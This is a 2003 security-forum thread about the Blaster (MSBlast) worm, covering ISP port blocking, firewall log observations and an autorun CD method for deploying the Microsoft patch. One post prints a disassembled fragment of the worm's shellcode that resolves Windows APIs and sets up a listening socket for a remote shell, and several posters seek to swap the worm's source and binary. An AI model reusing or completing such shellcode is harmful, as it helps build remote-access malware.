-
August 14th, 2003, 10:13 PM
#71
Member
Anyone with access to BBC 1, looks like they are going to do a peice on msblast in a few mins on the news
-
August 14th, 2003, 11:02 PM
#72
Anyone with access to BBC 1, looks like they are going to do a peice on msblast in a few mins on the news
bugger... missed it...!!!
Checking my firewall logs this morning.. yeh it is 8am here.. absolutly no hits on port 135, 69, 137 in the last 2.5 hrs.. get the feeling the ISP is blocking those ports.. I wonder how many others are doing the same..
Cheers
"Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr
-
August 14th, 2003, 11:26 PM
#73
I use two ISPs...............as of 06.00GMT today (14 August) FreeUK appeared to be doing this. My other one (Tiscali) was not, and I was getting a lot of hits up until about 2 hours ago (21.30Hrs GMT).
I did post (and got told off for!) the info that lavasoft have an update for Ad-aware that detects this malware..............also found a couple of other bad guys on my box, so it is worth the effort.........
This is newer than my last Ad-aware update post BTW
Cheers
Johnno
-
August 14th, 2003, 11:42 PM
#74
What I've done is (for windows machines that don't need to use RPC, like my own machines at home) route port 135 through my router to an internal IP address that doesn't exist. In the VERY unlikely event that I got this thing, it wouldn't be able to communicate to the outside because the port it's trying to come back through would go to a null destination. Of course, mandatory updates on antivirus is already done as is updating Microsoft's OS line.
If anyone out there needs to automate the patching for a lot of windows machines, you can do this:
1: Download the Windows 2000 patch or the Windows XP patch. Save it to the desktop.
2: Rename said patch to patch.exe or something similar. It will make the next step easier.
3: Create a new file on the desktop called autorun.inf. Open it in notepad and put the following lines in:
Code:
[autorun]
open=patch.exe -o -f -u
4: Burn these two files to a cd. Because of the autorun.inf and Window's inherent autoplay feature, the patch will automatically run. The -o means it will overwrite existing files, the -f means it will force all processes to die upon reboot signal, and the -u means it will be in unattended mode which makes life a lot easier for administrators running around trying to automate this process on dozens or more workstations.
Problem: it has to be run as administrator (or power users that can add patches to the system) so it's only a little better if you have dozens of regular standard user workstations.
We the willing, led by the unknowing, have been doing the impossible for the ungrateful. We have done so much with so little for so long that we are now qualified to do just about anything with almost nothing.
-
August 15th, 2003, 12:51 PM
#75
Junior Member
Just got my hands on the source code for the Blaster worm now.
Got it by a good friend in my mail some hours ago, so soon I gonna have some fun with examining it and see how it's made
-
August 15th, 2003, 03:29 PM
#76
Junior Member
Grinler..anyone
I am trying to find a binary or source code source for the W32/Blaster to put it into our lab for testing. Unfortunatly the gov. agency we support will not allow the Ops support staff change any machine untill in-house testing for effect is compleated. Buearocracy ya gotta love it.
-
August 15th, 2003, 04:17 PM
#77
I got the binary but unfortunately do not have access to the computer its stored on due to the power outage.
Zrekam, Mind sharing the source? Would love to take a look at it.
-
August 19th, 2003, 08:27 AM
#78
Junior Member
here is a snippet of the worms exploit code:
<Snippet>
loc_4AF: ; CODE XREF: seg000:000004A8j
sub esp, 34h
mov esi, esp
call GetKernel32BaseAddy
mov [esi], eax ; EAX is the base address of kernel32.dll
push dword ptr [esi]
push 0EC0E4E8Eh ; corresponds to LoadLibraryA
call ScanForAPI
mov [esi+8], eax
push dword ptr [esi]
push 0CE05D9ADh ; WaitForSingleObject
call ScanForAPI
mov [esi+0Ch], eax
push 6C6Ch
push 642E3233h
push 5F327377h ; ws32_2.dll
push esp
call dword ptr [esi+8]
mov [esi+4], eax ; esi + 4 = HModule of ws32_2.dll
push dword ptr [esi]
push 16B3FE72h ; CreateProcessA
call ScanForAPI
mov [esi+10h], eax
push dword ptr [esi]
push 73E2D87Eh ; ExitProcess
call ScanForAPI
mov [esi+14h], eax
push dword ptr [esi+4]
push 3BFCEDCBh ; WSAStartup
call ScanForAPI
mov [esi+18h], eax
push dword ptr [esi+4]
push 0ADF509D9h ; WSASocketA
call ScanForAPI
mov [esi+1Ch], eax
push dword ptr [esi+4]
push 0C7701AA4h ; bind
call ScanForAPI
mov [esi+20h], eax
push dword ptr [esi+4]
push 0E92EADA4h ; listen
call ScanForAPI
mov [esi+24h], eax
push dword ptr [esi+4]
push 498649E5h ; accept
call ScanForAPI
mov [esi+28h], eax
push dword ptr [esi+4]
push 79C679E7h ; closesocket
call ScanForAPI
mov [esi+2Ch], eax
xor edi, edi
sub esp, 190h
push esp
push 101h
call dword ptr [esi+18h] ; WSAStartup returns 0 if successful
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax ; call wsasocketa
</snippet>
This is just a little bit of the blaster worm, the rest of the code I am not allowed to reveal.
-
August 20th, 2003, 10:42 AM
#79
Originally posted here by Und3ertak3r
Noticed an increase in scans on the netbios ports, 137 in particular, as well almost matching the 135? coincidence?
Cheers
I've started getting hits, just like blaster on port 137 at around 8.00pm UTC last night & at the rate of every 10/15 mins.
Anyone know what this is?
<edit>
Actually the starting time may be wrong, but I'd still like to know what this is
</edit>
IT, e-commerce, Retail, Programme & Project Management, EPoS, Supply Chain and Logistic Services. Yorkshire. http://www.bigi.uk.com
-
August 28th, 2003, 10:20 AM
#80
My ISP has decided to UN-Block Port 135..
My firewall log is full of "Block TCP packet on port 135" .. this restarted sometime yesterday (local time) and the Port 135 probes here are as bad as during the 11th and 12th.. I don't want to exagerate.. it seems at the moment to be worse.. but.. I didnt run my system 24/7 at thate time..
I have taken the steps of advising the ISP, and asking why they removed the block, also asking that it may be prudent to re-block port 135..
and just for their records I supplied a short extract from my logs (about 5k).. that should give them enough food for thought.. or atleast some emailing to the users of those systems "You are infected" warnings.. Most of the ip's are from within their domains.. ie 144.134.XXX.XXX
I wonder howmany other ISP's have decided to unblock that port.. certainly shows (from here) the infection is still rampent..
Cheers
"Consumer technology now exceeds the average persons ability to comprehend how to use it..give up hope of them being able to understand how it works." - Me http://www.cybercrypt.co.nr
Posting Permissions
- You may not post new threads
- You may not post replies
- You may not post attachments
- You may not edit your posts
-
Forum Rules
|
|